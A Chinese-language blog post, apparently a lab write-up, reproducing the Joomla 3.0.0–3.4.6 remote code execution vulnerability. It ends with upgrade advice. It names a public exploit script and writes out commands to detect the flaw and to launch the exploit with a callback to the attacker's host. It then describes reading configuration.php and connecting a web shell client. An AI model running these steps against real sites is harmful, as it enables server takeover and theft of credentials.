Joomla 3.0.0 -3.4.6远程代码执行漏洞复现

目录

    • 漏洞概述
    • 漏洞影响版本
    • 复现环境
    • 复现过程
    • 修复建议

漏洞概述

2019年10月2日,意大利安全公司 Hacktive Security的研究员 AlessandroGroppo 公开了影响 Joomla 内容管理系统老旧版本 3.0.0 至 3.4.6 (在2012年9月末至2015年12月中旬发布)的0day 详情。漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。它尚不存在 CVE 编号且易于利用,类似于 CVE-2015-8562。

漏洞影响版本

Joomla 3.0.0-3.4.6

复现环境

1、 Joomla 3.4.6
下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6
2、靶机:win7(PHPStudy环境搭建)
攻击主机:kali2019

复现过程

1、将Joomla解压后,放入phpStudy\PHPTutorial\WWW下面Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第1张图片

2、访问http://xxx.xxx.xxx.xxx/Joomla后开始创建Joomla

Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第2张图片Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第3张图片
Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第4张图片Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第5张图片Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第6张图片
至此,Joomla已经安装完成。

3、下载脚本并进行检测该版本的Joomla是否有漏洞(出现Vulnerable则说明有漏洞)
下载地址:https://github.com/kiks7/rusty_joomla_rce

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/

在这里插入图片描述
结果显示该版本的Joomla确实有漏洞。

4、 利用脚本生成EXP进行攻击

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/ --exploit --lhost kali的IP --lport kali空闲端口

在这里插入图片描述
5、我们在靶机查看configuration.php
在这里插入图片描述
6、我们拿蚁剑进行连接
Joomla 3.0.0 -3.4.6远程代码执行漏洞复现_第7张图片
成功连接。至此,复现完成。

修复建议

将Joomla在官网上升级至最新版本。

你可能感兴趣的:(Web渗透,CMS)